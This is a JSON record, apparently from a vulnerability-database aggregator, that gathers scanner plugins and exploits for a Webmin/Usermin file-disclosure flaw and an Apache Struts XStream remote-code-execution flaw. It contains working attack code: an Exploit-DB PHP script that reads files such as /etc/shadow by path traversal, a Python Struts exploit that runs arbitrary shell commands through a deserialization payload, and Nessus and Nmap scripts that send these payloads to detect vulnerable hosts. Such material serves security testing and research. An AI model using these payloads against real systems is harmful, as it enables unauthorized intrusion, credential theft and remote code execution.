attribute:\"see_also\",\n value:\"https://security.gentoo.org/glsa/200608-11\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"All Webmin users should update to the latest stable version:\n # emerge --sync\n # emerge --ask --verbose --oneshot '>=app-admin/webmin-1.290'\n All Usermin users should update to the latest stable version:\n # emerge --sync\n # emerge --ask --verbose --oneshot '>=app-admin/usermin-1.220'\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:gentoo:linux:usermin\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:gentoo:linux:webmin\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:gentoo:linux\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2006/08/06\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2006/08/07\");\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2006/06/29\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2006-2019 Tenable Network Security, Inc.\");\n script_family(english:\"Gentoo Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Gentoo/release\", \"Host/Gentoo/qpkg-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"qpkg.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Gentoo/release\")) audit(AUDIT_OS_NOT, \"Gentoo\");\nif (!get_kb_item(\"Host/Gentoo/qpkg-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\n\nif (qpkg_check(package:\"app-admin/usermin\", unaffected:make_list(\"ge 1.220\"), vulnerable:make_list(\"lt 1.220\"))) flag++;\nif (qpkg_check(package:\"app-admin/webmin\", unaffected:make_list(\"ge 1.290\"), vulnerable:make_list(\"lt 1.290\"))) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:qpkg_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = qpkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"Webmin / Usermin\");\n}\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2020-03-18T03:31:39", "bulletinFamily": "scanner", "description": "The Usermin install on the remote host is affected by an information\ndisclosure flaw in the Perl script ", "modified": "2014-09-16T00:00:00", "id": "USERMIN_1220_INFO_DISCLOSURE.NASL", "href": "https://www.tenable.com/plugins/nessus/77704", "published": "2014-09-16T00:00:00", "title": "Usermin 'miniserv.pl' Arbitrary File Disclosure", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(77704);\n script_version(\"1.7\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2020/02/26\");\n\n script_cve_id(\"CVE-2006-3392\");\n script_bugtraq_id(18744);\n\n script_name(english:\"Usermin 'miniserv.pl' Arbitrary File Disclosure\");\n script_summary(english:\"Attempts to read a local file using miniserv.pl.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote web server is affected by an information disclosure flaw.\");\n script_set_attribute(attribute:\"description\", value:\n\"The Usermin install on the remote host is affected by an information\ndisclosure flaw in the Perl script 'miniserv.pl'. This flaw could\nallow a remote, unauthenticated attacker to read arbitrary files on\nthe affected host, subject to the privileges of the web server user\nid.\");\n script_set_attribute(attribute:\"see_also\", value:\"http://www.webmin.com/uchanges.html\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade Usermin 1.220 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2006-3392\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No exploit is required\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_nessus\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2006/06/29\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2006/06/29\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/09/16\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:webmin:usermin\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:usermin:usermin\");\n script_end_attributes();\n\n script_category(ACT_ATTACK);\n script_family(english:\"CGI abuses\");\n\n script_copyright(english:\"This script is Copyright (C) 2014-2020 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"usermin_detect.nbin\");\n script_require_keys(\"www/usermin\");\n script_require_ports(\"Services/www\", 20000);\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"http.inc\");\ninclude(\"data_protection.inc\");\n\napp = \"Usermin\";\nport = get_http_port(default:20000, embedded: TRUE);\nget_kb_item_or_exit('www/'+port+'/usermin');\n\ndir = '/';\ninstall_url = build_url(port:port, qs:dir);\n\n# Try to exploit the flaw to read a local file.\nfile = \"/etc/passwd\";\nexploit = \"unauthenticated\" + crap(data:\"/..%01\", length:60) + file;\n\nres = http_send_recv3(\n method : \"GET\",\n port : port,\n item : dir + exploit,\n exit_on_fail : TRUE\n);\n\n# There's a problem if there's an entry for root.\nif (egrep(pattern:\"root:.*:0:[01]:\", string:res[2]))\n{\n report = NULL;\n attach_file = NULL;\n output = NULL;\n req = install_url + exploit;\n request = NULL;\n\n if (report_verbosity > 0)\n {\n report =\n '\\n' + 'Nessus was able to exploit this issue with the following URL : ' +\n '\\n' + req + '\\n';\n\n if (report_verbosity > 1)\n {\n output = data_protection::redact_etc_passwd(output:res[2]);\n attach_file = file;\n request = make_list(req);\n }\n }\n\n security_report_v4(port:port,\n extra:report,\n severity:SECURITY_WARNING,\n request:request,\n file:attach_file,\n output:output);\n\n exit(0);\n}\naudit(AUDIT_WEB_APP_NOT_AFFECTED, app, install_url);\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2020-06-01T04:20:24", "bulletinFamily": "scanner", "description": "The remote web application appears to use the Apache Struts 2 web\nframework. A remote code execution vulnerability exists in the REST\nplugin, which uses XStreamHandler to insecurely deserialize\nuser-supplied input in XML requests. An unauthenticated, remote\nattacker can exploit this, via a specially crafted XML request, to\nexecute arbitrary code.\n\nNote that this plugin only reports the first vulnerable instance of a\nStruts 2 application.", "modified": "2020-06-02T00:00:00", "id": "STRUTS_2_5_13_REST_RCE.NASL", "href": "https://www.tenable.com/plugins/nessus/102977", "published": "2017-09-06T00:00:00", "title": "Apache Struts 2 REST Plugin XStream XML Request Deserialization RCE", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(102977);\n script_version(\"1.15\");\n script_cvs_date(\"Date: 2019/11/12\");\n\n script_cve_id(\"CVE-2017-9805\");\n\n script_name(english:\"Apache Struts 2 REST Plugin XStream XML Request Deserialization RCE\");\n script_summary(english:\"Attempts to execute arbitrary code.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote web server contains a web application that uses a Java\nframework that is affected by a remote code execution vulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote web application appears to use the Apache Struts 2 web\nframework. A remote code execution vulnerability exists in the REST\nplugin, which uses XStreamHandler to insecurely deserialize\nuser-supplied input in XML requests. An unauthenticated, remote\nattacker can exploit this, via a specially crafted XML request, to\nexecute arbitrary code.\n\nNote that this plugin only reports the first vulnerable instance of a\nStruts 2 application.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://cwiki.apache.org/confluence/display/WW/S2-052\");\n script_set_attribute(attribute:\"see_also\", value:\"https://cwiki.apache.org/confluence/display/WW/Version+Notes+2.3.34\");\n script_set_attribute(attribute:\"see_also\", value:\"https://cwiki.apache.org/confluence/display/WW/Version+Notes+2.5.13\");\n script_set_attribute(attribute:\"see_also\", value:\"https://lgtm.com/blog/apache_struts_CVE-2017-9805_announcement\");\n script_set_attribute(attribute:\"see_also\", value:\"https://lgtm.com/blog/apache_struts_CVE-2017-9805\");\n script_set_attribute(attribute:\"see_also\", value:\"https://github.com/jas502n/St2-052\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Apache Struts version 2.3.34 or 2.5.13 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2017-9805\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No exploit is required\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"d2_elliot_name\", value:\"Apache Struts REST Plugin XStream RCE\");\n script_set_attribute(attribute:\"exploit_framework_d2_elliot\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_nessus\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Apache Struts 2 REST Plugin XStream RCE');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/09/05\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/09/05\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/09/06\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:apache:struts\");\n script_end_attributes();\n\n script_category(ACT_ATTACK);\n script_family(english:\"CGI abuses\");\n\n script_copyright(english:\"This script is Copyright (C) 2017-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"http_version.nasl\", \"webmirror.nasl\", \"os_fingerprint.nasl\");\n script_exclude_keys(\"Settings/disable_cgi_scanning\");\n script_require_ports(\"Services/www\", 80, 8080);\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"http.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"torture_cgi_func.inc\");\ninclude(\"url_func.inc\");\n\nport = get_http_port(default:8080);\ncgis = get_kb_list('www/' + port + '/cgi');\n\nurls = make_list();\n# To identify actions that we can test the exploit on we will look\n# for files with the .action / .jsp / .do suffix from the KB.\nif (!isnull(cgis))\n{\n foreach cgi (cgis)\n {\n match = pregmatch(pattern:\"((^.*)(/.+\\.act(ion)?)($|\\?|;))\", string:cgi);\n if (match)\n {\n urls = make_list(urls, match[0]);\n if (!thorough_tests) break;\n }\n match2 = pregmatch(pattern:\"(^.*)(/.+\\.jsp)$\", string:cgi);\n if (!isnull(match2))\n {\n urls = make_list(urls, match2[0]);\n if (!thorough_tests) break;\n }\n match4 = pregmatch(pattern:\"(^.*)(/.+\\.do)$\", string:cgi);\n if (!isnull(match4))\n {\n urls = make_list(urls, match4[0]);\n if (!thorough_tests) break;\n }\n if (cgi =~ \"struts2?(-rest)?-showcase\")\n {\n urls = make_list(urls, cgi);\n if (!thorough_tests) break;\n }\n }\n}\n\nif (thorough_tests)\n{\n cgi2 = get_kb_list('www/' + port + '/content/extensions/act*');\n if (!isnull(cgi2)) urls = make_list(urls, cgi2);\n\n cgi3 = get_kb_list('www/' + port + '/content/extensions/jsp');\n if (!isnull(cgi3)) urls = make_list(urls, cgi3);\n\n cgi4 = get_kb_list('www/' + port + '/content/extensions/do');\n if (!isnull(cgi4)) urls = make_list(urls, cgi4);\n}\n\n# Always check web root\nurls = make_list(urls, \"/\");\n\n# Struts is slow\ntimeout = get_read_timeout() * 2;\nif(timeout < 10)\n timeout = 10;\n\nurls = list_uniq(urls);\nscanner_ip = compat::this_host();\ntarget_ip = get_host_ip();\nvuln = FALSE;\n\nua = get_kb_item(\"global_settings/http_user_agent\");\nif (empty_or_null(ua))\n ua = 'Nessus';\n\npat = hexstr(rand_str(length:10));\n\nos = get_kb_item(\"Host/OS\");\nif (!empty_or_null(os) && \"windows\" >< tolower(os))\n{\n ping_cmd = 'ping</string><string>-n</string><string>3</string><string>-l</string><string>500</string><string>' + scanner_ip;\n filter = \"icmp and icmp[0] = 8 and src host \" + target_ip + \" and greater 500\";\n}\nelse\n{\n ping_cmd = \"ping</string><string>-c</string><string>3</string><string>-p</string><string>\" + pat + \"</string><string>\" + scanner_ip;\n filter = \"icmp and icmp[0] = 8 and src host \" + target_ip;\n}\n\nforeach url (urls)\n{\n soc = open_sock_tcp(port);\n if (!soc) audit(AUDIT_SOCK_FAIL, port);\n\n post_payload = '<map><entry><jdk.nashorn.internal.objects.NativeString><flags>0</flags><value class=\"com.sun.xml.internal.bind.v2.runtime.unmarshaller.Base64Data\"><dataHandler><dataSource class=\"com.sun.xml.internal.ws.encoding.xml.XMLMessage$XmlDataSource\"><is class=\"javax.crypto.CipherInputStream\"><cipher class=\"javax.crypto.NullCipher\"><initialized>false</initialized><opmode>0</opmode><serviceIterator class=\"javax.imageio.spi.FilterIterator\"><iter class=\"javax.imageio.spi.FilterIterator\"><iter class=\"java.util.Collections$EmptyIterator\"/><next class=\"java.lang.ProcessBuilder\"><command><string>' +\n ping_cmd +\n '</string></command><redirectErrorStream>false</redirectErrorStream></next></iter><filter class=\"javax.imageio.ImageIO$ContainsFilter\"><method><class>java.lang.ProcessBuilder</class><name>start</name><parameter-types/></method><name>foo</name></filter><next class=\"string\">foo</next></serviceIterator><lock/></cipher><input class=\"java.lang.ProcessBuilder$NullInputStream\"/><ibuffer></ibuffer><done>false</done><ostart>0</ostart><ofinish>0</ofinish><closed>false</closed></is><consumed>false</consumed></dataSource><transferFlavors/></dataHandler><dataLen>0</dataLen></value></jdk.nashorn.internal.objects.NativeString><jdk.nashorn.internal.objects.NativeString reference=\"../jdk.nashorn.internal.objects.NativeString\"/></entry><entry><jdk.nashorn.internal.objects.NativeString reference=\"../../entry/jdk.nashorn.internal.objects.NativeString\"/><jdk.nashorn.internal.objects.NativeString reference=\"../../entry/jdk.nashorn.internal.objects.NativeString\"/></entry></map>';\n\n attack_url = url;\n\n req =\n 'POST ' + attack_url + ' HTTP/1.1\\n' +\n 'Host: ' + target_ip + ':' + port + '\\n' +\n 'User-Agent: ' + ua + '\\n' +\n 'Accept-Language: en-US\\n' +\n 'Content-Type: application/xml\\n' +\n 'Content-Length: ' + strlen(post_payload) + '\\n' +\n 'Connection: Keep-Alive\\n' +\n '\\n' + post_payload;\n\n s = send_capture(socket:soc,data:req,pcap_filter:filter,timeout:timeout);\n icmp = tolower(hexstr(get_icmp_element(icmp:s,element:\"data\")));\n close(soc);\n\n if (\"windows\" >< tolower(os) && !isnull(icmp))\n {\n vuln = TRUE;\n vuln_url = req;\n report =\n '\\nNessus confirmed this issue by examining ICMP traffic. '+\n 'Below is the response :' +\n '\\n\\n' + snip +\n '\\n' + icmp +\n '\\n' + snip +\n '\\n';\n break;\n }\n else if (pat >< icmp)\n {\n vuln = TRUE;\n vuln_url = req;\n report =\n '\\nNessus confirmed this issue by examining ICMP traffic and looking for'+\n '\\nthe pattern sent in our packet (' + pat + '). Below is the response :'+\n '\\n\\n' + snip +\n '\\n' + icmp +\n '\\n' + snip +\n '\\n';\n break;\n }\n\n # Stop after first vulnerable Struts app is found\n if (vuln) break;\n}\n\nif (!vuln) exit(0, 'No vulnerable applications were detected on the web server listening on port '+port+'.');\n\nsecurity_report_v4(\n port : port,\n severity : SECURITY_WARNING,\n generic : TRUE,\n request : make_list(vuln_url),\n output : report\n);\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "exploitdb": [{"lastseen": "2016-01-31T15:18:44", "bulletinFamily": "exploit", "description": "Webmin < 1.290 / Usermin < 1.220 Arbitrary File Disclosure Exploit. CVE-2006-3392. Remote exploits for multiple platform", "modified": "2006-07-09T00:00:00", "published": "2006-07-09T00:00:00", "id": "EDB-ID:1997", "href": "https://www.exploit-db.com/exploits/1997/", "type": "exploitdb", "title": "Webmin < 1.290 / Usermin < 1.220 - Arbitrary File Disclosure Exploit PHP", "sourceData": "<?php\r\n/*\r\nName : Webmin / Usermin Arbitrary File Disclosure Vulnerability\r\nDate : 2006-06-30\r\nPatch : update to version 1.290\r\nAdvisory : http://securitydot.net/vuln/exploits/vulnerabilities/articles/17885/vuln.html\r\nCoded by joffer , http://securitydot.net\r\n*/\r\n\r\n$host = $argv[1];\r\n$port = $argv[2];\r\n$http = $argv[3];\r\n$file = $argv[4];\r\n// CHECKING THE INPUT\r\nif($host != \"\" && $port != \"\" && $http != \"\" && $file != \"\") {\r\n\r\n\r\n$z = \"/..%01\";\r\nfor ($i=0;$i<60;$i++) {\r\n $z.=\"/..%01\";\r\n}\r\n\r\n$target = $http.\"://\".$host.\":\".$port.\"/unauthenticated\".$z.\"/\".$file.\"\";\r\n\r\necho \"Attacking \".$host.\"\\n\";\r\necho \"---------------------------------\\n\";\r\n\r\n// INITIALIZING CURL SESSION TO THE TARGET\r\n\r\n$ch = curl_init();\r\n\r\ncurl_setopt ($ch, CURLOPT_RETURNTRANSFER, 1);\r\ncurl_setopt($ch, CURLOPT_URL, $target);\r\ncurl_setopt ($ch, CURLOPT_TIMEOUT, '10');\r\ncurl_setopt($ch,CURLOPT_SSL_VERIFYPEER,FALSE);\r\n\r\n$content = curl_exec($ch);\r\ncurl_close ($ch);\r\n\r\n// CLOSING CURL\r\n\r\n// ECHOING THE CONTENT OF THE $FILE\r\necho $content;\r\n\r\necho \"---------------------------------\\n\";\r\necho \"Coded by joffer , http://securitydot.net\\n\";\r\n\r\n} else {\r\n // IF INPUT IS NOT CORRECT DISPLAY THE README\r\n echo \"Usage php webmin.php HOST PORT HTTP/HTTPS FILE\\n\";\r\n echo \"Example : php webmin.php localhost 10000 http /etc/shadow\\n\";\r\n echo \"Coded by joffer , http://securitydot.net\\n\";\r\n}\r\n\r\n?>\r\n\r\n# milw0rm.com [2006-07-09]\r\n", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}, "sourceHref": "https://www.exploit-db.com/download/1997/"}, {"lastseen": "2017-09-07T10:25:56", "bulletinFamily": "exploit", "description": "Apache Struts 2.5 - Remote Code Execution. CVE-2017-9805. Remote exploit for Linux platform", "modified": "2017-09-06T00:00:00", "published": "2017-09-06T00:00:00", "id": "EDB-ID:42627", "href": "https://www.exploit-db.com/exploits/42627/", "type": "exploitdb", "title": "Apache Struts 2.5 - Remote Code Execution", "sourceData": "# Exploit Title: Struts 2.5 - 2.5.12 REST Plugin XStream RCE\r\n# Google Dork: filetype:action\r\n# Date: 06/09/2017\r\n# Exploit Author: Warflop\r\n# Vendor Homepage: https://struts.apache.org/\r\n# Software Link: http://mirror.nbtelecom.com.br/apache/struts/2.5.10/struts-2.5.10-all.zip\r\n# Version: Struts 2.5 \u00e2\u20ac\u201c Struts 2.5.12\r\n# Tested on: Struts 2.5.10\r\n# CVE : 2017-9805\r\n\r\n#!/usr/bin/env python3\r\n# coding=utf-8\r\n# *****************************************************\r\n# Struts CVE-2017-9805 Exploit\r\n# Warflop (http://securityattack.com.br/)\r\n# Greetz: Pimps & G4mbl3r\r\n# *****************************************************\r\nimport requests\r\nimport sys\r\n\r\ndef exploration(command):\r\n\r\n\texploit = '''\r\n\t\t\t\t<map>\r\n\t\t\t\t<entry>\r\n\t\t\t\t<jdk.nashorn.internal.objects.NativeString>\r\n\t\t\t\t<flags>0</flags>\r\n\t\t\t\t<value class=\"com.sun.xml.internal.bind.v2.runtime.unmarshaller.Base64Data\">\r\n\t\t\t\t<dataHandler>\r\n\t\t\t\t<dataSource class=\"com.sun.xml.internal.ws.encoding.xml.XMLMessage$XmlDataSource\">\r\n\t\t\t\t<is class=\"javax.crypto.CipherInputStream\">\r\n\t\t\t\t<cipher class=\"javax.crypto.NullCipher\">\r\n\t\t\t\t<initialized>false</initialized>\r\n\t\t\t\t<opmode>0</opmode>\r\n\t\t\t\t<serviceIterator class=\"javax.imageio.spi.FilterIterator\">\r\n\t\t\t\t<iter class=\"javax.imageio.spi.FilterIterator\">\r\n\t\t\t\t<iter class=\"java.util.Collections$EmptyIterator\"/>\r\n\t\t\t\t<next class=\"java.lang.ProcessBuilder\">\r\n\t\t\t\t<command>\r\n\t\t\t\t<string>/bin/sh</string><string>-c</string><string>'''+ command +'''</string>\r\n\t\t\t\t</command>\r\n\t\t\t\t<redirectErrorStream>false</redirectErrorStream>\r\n\t\t\t\t</next>\r\n\t\t\t\t</iter>\r\n\t\t\t\t<filter class=\"javax.imageio.ImageIO$ContainsFilter\">\r\n\t\t\t\t<method>\r\n\t\t\t\t<class>java.lang.ProcessBuilder</class>\r\n\t\t\t\t<name>start</name>\r\n\t\t\t\t<parameter-types/>\r\n\t\t\t\t</method>\r\n\t\t\t\t<name>foo</name>\r\n\t\t\t\t</filter>\r\n\t\t\t\t<next class=\"string\">foo</next>\r\n\t\t\t\t</serviceIterator>\r\n\t\t\t\t<lock/>\r\n\t\t\t\t</cipher>\r\n\t\t\t\t<input class=\"java.lang.ProcessBuilder$NullInputStream\"/>\r\n\t\t\t\t<ibuffer/>\r\n\t\t\t\t<done>false</done>\r\n\t\t\t\t<ostart>0</ostart>\r\n\t\t\t\t<ofinish>0</ofinish>\r\n\t\t\t\t<closed>false</closed>\r\n\t\t\t\t</is>\r\n\t\t\t\t<consumed>false</consumed>\r\n\t\t\t\t</dataSource>\r\n\t\t\t\t<transferFlavors/>\r\n\t\t\t\t</dataHandler>\r\n\t\t\t\t<dataLen>0</dataLen>\r\n\t\t\t\t</value>\r\n\t\t\t\t</jdk.nashorn.internal.objects.NativeString>\r\n\t\t\t\t<jdk.nashorn.internal.objects.NativeString reference=\"../jdk.nashorn.internal.objects.NativeString\"/>\r\n\t\t\t\t</entry>\r\n\t\t\t\t<entry>\r\n\t\t\t\t<jdk.nashorn.internal.objects.NativeString reference=\"../../entry/jdk.nashorn.internal.objects.NativeString\"/>\r\n\t\t\t\t<jdk.nashorn.internal.objects.NativeString reference=\"../../entry/jdk.nashorn.internal.objects.NativeString\"/>\r\n\t\t\t\t</entry>\r\n\t\t\t\t</map>\r\n\t\t\t\t'''\r\n\r\n\r\n\turl = sys.argv[1]\r\n\r\n\theaders = {'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:54.0) Gecko/20100101 Firefox/54.0',\r\n\t\t\t'Content-Type': 'application/xml'}\r\n\r\n\trequest = requests.post(url, data=exploit, headers=headers)\r\n\tprint request.text\r\n\r\nif len(sys.argv) < 3:\r\n\tprint ('CVE: 2017-9805 - Apache Struts2 Rest Plugin Xstream RCE')\r\n\tprint ('[*] Warflop - http://securityattack.com.br')\r\n\tprint ('[*] Greatz: Pimps & G4mbl3r')\r\n\tprint ('[*] Use: python struts2.py URL COMMAND')\r\n\tprint ('[*] Example: python struts2.py http://sitevulnerable.com/struts2-rest-showcase/orders/3 id')\r\n\texit(0)\r\nelse:\r\n\texploration(sys.argv[2])", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://www.exploit-db.com/download/42627/"}], "nmap": [{"lastseen": "2019-05-30T17:05:31", "bulletinFamily": "scanner", "description": "Exploits a file disclosure vulnerability in Webmin (CVE-2006-3392) \n\nWebmin before 1.290 and Usermin before 1.220 calls the simplify_path function before decoding HTML. This allows arbitrary files to be read, without requiring authentication, using \"..%01\" sequences to bypass the removal of \"../\" directory traversal sequences.\n\n## Script Arguments \n\n#### http-vuln-cve2006-3392.file \n\n&lt;FILE&gt;. Default: /etc/passwd\n\n#### slaxml.debug \n\nSee the documentation for the slaxml library. \n\n#### http.host, http.max-body-size, http.max-cache-size, http.max-pipeline, http.pipeline, http.truncated-ok, http.useragent \n\nSee the documentation for the http library. \n\n#### smbdomain, smbhash, smbnoguest, smbpassword, smbtype, smbusername \n\nSee the documentation for the smbauth library. \n\n#### vulns.short, vulns.showall \n\nSee the documentation for the vulns library. \n\n## Example Usage \n \n \n nmap -sV --script http-vuln-cve2006-3392 <target>\n nmap -p80 --script http-vuln-cve2006-3392 --script-args http-vuln-cve2006-3392.file=/etc/shadow <target>\n\n## Script Output \n \n \n PORT STATE SERVICE REASON\n 10000/tcp open webmin syn-ack\n | http-vuln-cve2006-3392:\n | VULNERABLE:\n | Webmin File Disclosure\n | State: VULNERABLE (Exploitable)\n | IDs: CVE:CVE-2006-3392\n | Description:\n | Webmin before 1.290 and Usermin before 1.220 calls the simplify_path function before decoding HTML.\n | This allows arbitrary files to be read, without requiring authentication, using \"..%01\" sequences\n | to bypass the removal of \"../\" directory traversal sequences.\n | Disclosure date: 2006\n | Extra information:\n | Proof of Concept:/unauthenticated/..%01/..%01/(..)/etc/passwd\n | References:\n | http://www.rapid7.com/db/modules/auxiliary/admin/webmin/file_disclosure\n |_ http://www.exploit-db.com/exploits/1997/\n \n\n## Requires \n\n * http\n * shortport\n * stdnse\n * vulns\n\n* * *\n", "modified": "2018-05-26T21:10:36", "published": "2014-05-04T15:00:06", "id": "NMAP:HTTP-VULN-CVE2006-3392.NSE", "href": "https://nmap.org/nsedoc/scripts/http-vuln-cve2006-3392.html", "title": "http-vuln-cve2006-3392 NSE Script", "type": "nmap", "sourceData": "local http = require \"http\"\nlocal shortport = require \"shortport\"\nlocal stdnse = require \"stdnse\"\nlocal vulns = require \"vulns\"\n\ndescription = [[\nExploits a file disclosure vulnerability in Webmin (CVE-2006-3392)\n\nWebmin before 1.290 and Usermin before 1.220 calls the simplify_path function before decoding HTML.\nThis allows arbitrary files to be read, without requiring authentication, using \"..%01\" sequences\nto bypass the removal of \"../\" directory traversal sequences.\n]]\n---\n-- @usage\n-- nmap -sV --script http-vuln-cve2006-3392 <target>\n-- nmap -p80 --script http-vuln-cve2006-3392 --script-args http-vuln-cve2006-3392.file=/etc/shadow <target>\n-- @output\n-- PORT STATE SERVICE REASON\n-- 10000/tcp open webmin syn-ack\n-- | http-vuln-cve2006-3392:\n-- | VULNERABLE:\n-- | Webmin File Disclosure\n-- | State: VULNERABLE (Exploitable)\n-- | IDs: CVE:CVE-2006-3392\n-- | Description:\n-- | Webmin before 1.290 and Usermin before 1.220 calls the simplify_path function before decoding HTML.\n-- | This allows arbitrary files to be read, without requiring authentication, using \"..%01\" sequences\n-- | to bypass the removal of \"../\" directory traversal sequences.\n-- | Disclosure date: 2006\n-- | Extra information:\n-- | Proof of Concept:/unauthenticated/..%01/..%01/(..)/etc/passwd\n-- | References:\n-- | http://www.rapid7.com/db/modules/auxiliary/admin/webmin/file_disclosure\n-- |_ http://www.exploit-db.com/exploits/1997/\n--\n-- @args http-vuln-cve2006-3392.file <FILE>. Default: /etc/passwd\n---\n\nauthor = \"Paul AMAR <aos.paul@gmail.com>\"\nlicense = \"Same as Nmap--See https://nmap.org/book/man-legal.html\"\ncategories = {\"exploit\",\"vuln\",\"intrusive\"}\n\nportrule = shortport.portnumber({10000})\n\naction = function(host, port)\n local file_var = stdnse.get_script_args(SCRIPT_NAME .. \".file\") or \"/etc/passwd\"\n\n local vuln = {\n title = 'Webmin File Disclosure',\n state = vulns.STATE.NOT_VULN, -- default\n IDS = {CVE = 'CVE-2006-3392'},\n description = [[\nWebmin before 1.290 and Usermin before 1.220 calls the simplify_path function before decoding HTML.\nThis allows arbitrary files to be read, without requiring authentication, using \"..%01\" sequences\nto bypass the removal of \"../\" directory traversal sequences.\n]],\n references = {\n 'http://www.exploit-db.com/exploits/1997/',\n 'http://www.rapid7.com/db/modules/auxiliary/admin/webmin/file_disclosure',\n },\n dates = {\n disclosure = {year = '2006', month = '06', day = '29'},\n },\n }\n\n local vuln_report = vulns.Report:new(SCRIPT_NAME, host, port)\n local url = \"/unauthenticated/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01\" .. file_var\n\n stdnse.debug1(\"Getting \" .. file_var)\n\n local detection_session = http.get(host, port, url)\n\n stdnse.debug1(\"Status code:\"..detection_session.status)\n if detection_session and detection_session.status == 200 then\n vuln.state = vulns.STATE.EXPLOIT\n stdnse.debug1(detection_session.body)\n return vuln_report:make_output(vuln)\n end\nend\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}], "metasploit": [{"lastseen": "2020-05-21T20:59:25", "bulletinFamily": "exploit", "description": "A vulnerability has been reported in Webmin and Usermin, which can be exploited by malicious people to disclose potentially sensitive information. The vulnerability is caused due to an unspecified error within the handling of an URL. This can be exploited to read the contents of any files on the server via a specially crafted 